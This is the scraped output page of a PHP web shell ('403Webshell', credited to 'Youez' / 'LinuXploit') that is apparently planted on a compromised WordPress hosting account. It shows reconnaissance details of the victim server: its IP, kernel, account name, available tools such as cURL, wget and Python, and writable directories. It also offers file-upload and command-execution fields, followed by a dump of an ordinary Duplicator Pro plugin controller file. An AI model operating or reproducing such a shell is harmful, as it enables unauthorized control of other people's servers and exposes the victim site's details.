403Webshell
Server IP : 104.21.14.103  /  Your IP : 3.145.155.91
Web Server : LiteSpeed
System : Linux business53.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : giankuin ( 1871)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/giankuin/khowordpress.com/wp-content/plugins/duplicator-pro/views/schedules/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/giankuin/khowordpress.com/wp-content/plugins/duplicator-pro/views/schedules/schedule.controller.php
<?php
defined("ABSPATH") or die("");
DUP_PRO_U::hasCapability('export');

require_once(DUPLICATOR_PRO_PLUGIN_PATH . '/lib/snaplib/class.snaplib.u.url.php');

$inner_page = isset($_REQUEST['inner_page']) ? sanitize_text_field($_REQUEST['inner_page']) : 'schedules';
/*
switch ($inner_page)
{
    case 'edit':
        if (!wp_verify_nonce($_GET['_wpnonce'], 'edit-schedule')) {
            die('Security issue');
        }
        break;
}*/

$profile_url = DUP_PRO_U::getMenuPageURL(DUP_PRO_Constants::$SCHEDULES_SUBMENU_SLUG, false);
$schedules_tab_url = DupProSnapLibURLU::appendQueryValue($profile_url, 'tab', 'schedules');
$edit_schedule_url = DupProSnapLibURLU::appendQueryValue($schedules_tab_url, 'inner_page', 'edit');
// Not used wp_nonce_url because Edit existing schedule js not working after encoding
$edit_schedule_url .= '&_wpnonce='.wp_create_nonce('edit-schedule');

new DUP_PRO_CTRL_Schedule();
switch ($inner_page)
{
    case 'schedules': include('schedule.list.php');
        break;
    case 'edit': include('schedule.edit.php');
        break;
}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit